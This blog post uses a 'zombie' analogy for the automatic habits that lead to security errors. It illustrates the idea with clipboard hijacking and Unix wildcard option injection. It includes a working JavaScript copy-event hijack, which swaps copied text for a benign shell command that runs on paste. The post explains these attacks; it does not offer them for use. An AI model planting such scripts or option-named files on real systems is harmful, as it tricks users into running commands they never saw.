Computer Security and Zombies, Part II


In my previous blog post, I mused about the concept of a Philosophical Zombie (P-Zombie) in the world of Computer Security. A P-Zombie looks and acts human, but behaves without intention or sentience. The behavior may be complex, but it lacks free will. In the security space, where errors are the source of many vulnerabilities, I suggested that every software author plays the part of a Security Zombie on a regular basis. Our intentional, highest consciousness is too resource-intensive to focus on everything. We wouldn’t be able to function in complex situations if we couldn’t abstract, automate, and even react impulsively.

In short, our minds are designed to think intentionally about a very small number of things while thinking about everything else on auto-pilot!

I am going to torture the P-Zombie analogy much further. Instead of thinking of the human mind as one single entity, I will describe it as a tiny human pilot in a control room surrounded by a horde of zombies. The pilot is intentional and sentient. The zombies are mindless creatures that simply complete automated tasks. The pilot is in charge of the highest thought processes but passes on countless tasks for execution to the shuffling minions outside the control room.

These zombies, inside all of our brains, are the source of many errors that result in computer security vulnerabilities.

Unfortunately, we need them. Imagine a computer software developer writing code. Think about all the different levels of automation that go into that task. Do you suppose the developer thinks consciously about every single key press? No! And thank goodness it is so, because otherwise the code would take forever to write! Fortunately for all of us, the developer has a zombie automation that can handle the banality of typing letters on a keyboard while the tiny pilot tries to consciously create solutions to complex problems.

But even in the complex processing, the pilot cannot possibly consider every detail and resorts to abstraction. From a certain point of view, an abstraction is another form of automation, another zombie in the mind. As an incredibly trivial example, consider the original emoticon smiley face:

:)

It’s just a colon and a right parenthesis, yet we are willing to abstract those two symbols into a face, and an emotive one at that. While you and I can analyze :) consciously if we wish, it is generally just an artifact of one of our many internal automated zombies.

But while we need these zombies, they are both a blessing and a curse. Our automations and our abstractions inevitably result in errors. We either use automation when it isn’t appropriate, or we find our abstraction doesn’t work in certain unexpected edge cases. The bad guys in the computer security world win quite often by using their pilots against everyone else’s zombies.

I found two examples of this in my research the other day that I think are worth sharing.

The first is an article about a security vulnerability related to “copy and paste.” As advanced web developers know, most webpages of even moderate complexity contain dynamically generated data. That is, the data displayed on the webpage is being created on-the-fly by a computer program. But these web programs can also alter the contents of data copied to the clipboard. This means that the data you copy from a webpage may be completely different from what you see on the screen!

The security implications are quite serious. Under certain circumstances, bad guys could even cause a victim’s computer to execute harmful commands when the altered clipboard contents are pasted into certain applications, such as a terminal. Obviously it is important to know about these dangers.

But even users who do know will often not think about it in practice. It’s just one more detail for our fictional pilot to think about; one more thing that it generally turns over to an automated zombie. When you visit a web page, do you really want to think about how the data on the page is created? Do you really want to have to think about how copy and paste works?
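To make the trick concrete, here is a minimal sketch of how a page script can rewrite copied text. The helper name and its harmless payload are my own inventions for illustration; real attacks substitute genuinely malicious commands.

```javascript
// Illustrative "clipboard hijacking" sketch. The function name and
// the benign payload are made up for this example.
function buildClipboardPayload(visibleText) {
  // The trailing newline means a pasted shell command runs
  // immediately, before the victim has a chance to inspect it.
  return 'echo "not what you copied" # ' + visibleText + "\n";
}

// Browser-only wiring: intercept every copy and swap the text.
if (typeof document !== "undefined") {
  document.addEventListener("copy", (event) => {
    const visible = String(window.getSelection());
    event.preventDefault();
    event.clipboardData.setData("text/plain", buildClipboardPayload(visible));
  });
}
```

The user sees and selects one thing, but what actually lands on the clipboard is whatever the page script chooses.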

The second example is far more esoteric and I won’t go into too much technical detail. The high-level summary is that commands in operating systems like Unix or Linux often use wildcard symbols to select many files. When a wildcard is used, the command will operate on every file that matches the pattern. However, these commands also take control parameters that change how they work. If a bad guy gives a file the same name as a control parameter, and this name matches the wildcard pattern, then instead of being interpreted as a file it will change the behavior of the command.

There are a couple of key points that I want to note in the context of this blog post.

  1. The bad guy causes havoc simply by naming a file!
  2. This vulnerability is old and many people don't even know it exists anymore!

I emphasize these points because they illustrate the problem with the zombie horde we have in our brains. As with the first, this second vulnerability exploits abstractions that computer users have in their heads. When I see those wildcards, for example, I automatically think file names. Although I know how it works under the hood, I haven’t ever broken that abstraction long enough to look for this vulnerability before.

What is to be done? I believe the key is learning how to put our inner zombie on a leash. Various approaches, such as formal methods, enable us to do exactly that. In a subsequent post, I’ll discuss a few of these in greater detail.

Ready to learn more?

Fill out this form

or email us at info@crimsonvista.com